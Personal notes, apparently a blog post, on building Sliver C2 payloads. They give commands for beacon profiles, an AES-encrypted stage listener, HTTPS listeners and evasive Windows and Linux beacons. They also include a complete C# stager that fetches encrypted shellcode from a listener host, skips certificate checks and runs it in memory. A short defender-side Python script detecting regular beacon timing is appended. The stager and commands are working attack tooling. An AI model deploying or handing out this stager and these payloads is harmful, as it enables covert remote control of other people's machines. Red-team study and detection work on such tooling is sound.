Sliver Payload Generation

The content on this page is intended as my personal notes: a quick reference for crafting Sliver payloads.

Generate a sliver profile and staged listener

To generate staged payloads, we first need two things: a sliver profile and a staged listener. The sliver profile holds the configuration for the stage 2 payload, while the staged listener serves as the stage 1 listener/payload.

Start by running a command like the Windows shellcode example below. This creates a sliver profile (named 'https-win' in the text; the example commands below use the profile names no_games and no_rulez).

Windows Beacon Profile

profiles new beacon --arch amd64 --os windows --http https://192.168.68.135:443 -f shellcode --evasion --timeout 300 --seconds 5 --jitter 1 no_games

Linux Beacon Profile

profiles new beacon --arch amd64 --os linux --mtls 172.16.1.2:4433 -f elf --evasion --timeout 300 --seconds 5 --jitter 1 no_rulez

Note: For opsec purposes, let's use the gzip compression and AES encryption settings.

HTTPS Listener for Windows Profile

stage-listener --url https://192.168.68.135:4433 --profile no_games --compress gzip --aes-encrypt-key "LgUmeMnmUpRrCBRB" --aes-encrypt-iv "nStxRW5o6TNHcKBx"

Start Listener for Windows / Linux Profile

https --lhost 192.168.68.135 --lport 443

C# payload Template

Bishop Fox was kind enough to provide a C# template for our staged payload. The code is reproduced below; make sure you replace the AES key and AES IV with the values you set above.

C# template (from the Sliver documentation):
using System;
using System.Collections.Generic;
using System.IO;
using System.IO.Compression;
using System.Linq;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;

namespace Custom_Stager
{
    class Program
    {
        private static string url = "https://192.168.68.135:4433/text-fonts.woff";
        private static string AESKey = "LgUmeMnmUpRrCBRB";
        private static string AESIV = "nStxRW5o6TNHcKBx";

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        // Decrypt
        private static byte[] AESDecrypt(byte[] ciphertext, string AESKey, string AESIV) {
            byte[] key = Encoding.UTF8.GetBytes(AESKey);
            byte[] IV = Encoding.UTF8.GetBytes(AESIV);

            using (Aes aesAlg = Aes.Create())
            {
                aesAlg.Key = key;
                aesAlg.IV = IV;
                aesAlg.Padding = PaddingMode.None;

                ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);

                using (MemoryStream memoryStream = new MemoryStream(ciphertext))
                {
                    using (CryptoStream cryptoStream = new CryptoStream(memoryStream, decryptor, CryptoStreamMode.Write))
                    {
                        cryptoStream.Write(ciphertext, 0, ciphertext.Length);
                        return memoryStream.ToArray();
                    }
                }
            }
        }

        // Gzip 
        public static byte[] Decompress(byte[] input)
        {
            using (MemoryStream tmpMs = new MemoryStream())
            {
                using (MemoryStream ms = new MemoryStream(input))
                {
                    GZipStream zip = new GZipStream(ms, CompressionMode.Decompress, true);
                    zip.CopyTo(tmpMs);
                    zip.Close();
                }
                return tmpMs.ToArray();
            }
        }

        public static byte[] Download(string url) {
            // Accept any server certificate, so a self-signed listener certificate does not abort the download
            ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;
            System.Net.WebClient client = new System.Net.WebClient();
            byte[] shellcode = client.DownloadData(url);

            return shellcode;
        }

        public static void Execute(byte[] code) {
            List<byte> list = new List<byte> { };   

            // Skip the first 16 bytes of the download; the remainder is the encrypted, compressed stage
            for (int i = 16; i <= code.Length -1; i++) {
                list.Add(code[i]);
            }

            byte[] encrypted = list.ToArray();
            
            byte[] decrypted;
            decrypted = AESDecrypt(encrypted, AESKey, AESIV);   // First, AES decrypt

            byte[] decompressed = Decompress(decrypted);        // Second, GZip decompress
            
            // Execute stuff
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)decompressed.Length, 0x3000, 0x40);
            Marshal.Copy(decompressed, 0, addr, decompressed.Length);

            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

            return;
        }

        // Main Entry
        public static void Main(String[] args) 
        {
            // Get staged payload
            byte[] output = Download(url);

            Execute(output);

            return;
        }
    }
}

Payload Creation

Using the C# template above, along with our AES key and AES IV, we can create our staged payload by compiling it on a comparable target such as Windows 2019.

Success!!!!

Create new Beacon shellcode for Windows using your HTTPS

Note: a profile is not needed for this step.

Sliver C2 has two communication modes: Beacons and Sessions. For red team operations where operational security (opsec) matters, Beacons are preferred: they communicate asynchronously, checking in periodically at a configured interval. Sessions use an interactive connection, which is noisier and less conducive to maintaining opsec.

generate beacon --http https://192.168.68.135 --save /home/kali/ --seconds 60 --os windows --evasion
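A defender-side illustration of the check-in cadence described above, added here and not part of the original notes: a small Python script that groups requests per source/destination pair from constructed proxy log lines and flags pairs whose gaps between requests are nearly constant, the pattern a beacon generated with --seconds 60 --jitter 1 produces. The log lines, hosts and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log lines (not from the page): "<ISO timestamp> <src> <dst> <path>".
# 10.0.0.5 reaches the C2 host on a near-fixed 60 s cadence, as a beacon generated with
# --seconds 60 --jitter 1 would; 10.0.0.9 is an ordinary browsing client with irregular gaps.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 192.168.68.135 /
2024-05-01T10:00:59 10.0.0.5 192.168.68.135 /
2024-05-01T10:02:00 10.0.0.5 192.168.68.135 /
2024-05-01T10:03:00 10.0.0.5 192.168.68.135 /
2024-05-01T10:04:00 10.0.0.5 192.168.68.135 /
2024-05-01T10:00:03 10.0.0.9 example.com /index.html
2024-05-01T10:00:07 10.0.0.9 example.com /style.css
2024-05-01T10:01:40 10.0.0.9 example.com /news
2024-05-01T10:05:12 10.0.0.9 example.com /about
2024-05-01T10:05:13 10.0.0.9 example.com /logo.png
"""

def parse_log(text):
    """Group request timestamps by (src, dst) pair, sorted in time order."""
    series = defaultdict(list)
    for line in text.splitlines():
        if line.strip():
            ts, src, dst = line.split()[:3]
            series[(src, dst)].append(datetime.fromisoformat(ts))
    return {pair: sorted(stamps) for pair, stamps in series.items()}

def interval_stats(stamps):
    """Mean gap in seconds and coefficient of variation of consecutive gaps."""
    gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    m = mean(gaps)
    return m, (pstdev(gaps) / m if m else float("inf"))

def beacon_candidates(text, min_requests=5, max_cv=0.05):
    """Flag (src, dst) pairs whose request cadence is nearly constant.

    A tiny coefficient of variation means the gaps hardly move around their
    mean: the signature of a low-jitter beacon, not of human browsing.
    """
    flagged = []
    for (src, dst), stamps in parse_log(text).items():
        if len(stamps) < min_requests:
            continue
        m, cv = interval_stats(stamps)
        if cv <= max_cv:
            flagged.append((src, dst, round(m, 1), round(cv, 3)))
    return flagged
```

Raising --jitter widens the spread of gaps and pushes the coefficient of variation up, so the threshold should be tuned against your own baseline traffic rather than fixed at 0.05.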

Create new Beacon payload for linux using your HTTPS

Note: a profile is not needed for this step.

If you are targeting a Linux operating system, use the syntax below to generate Linux payloads.

generate beacon --http https://192.168.68.135 --save /home/kali/ --seconds 60 --os linux --evasion
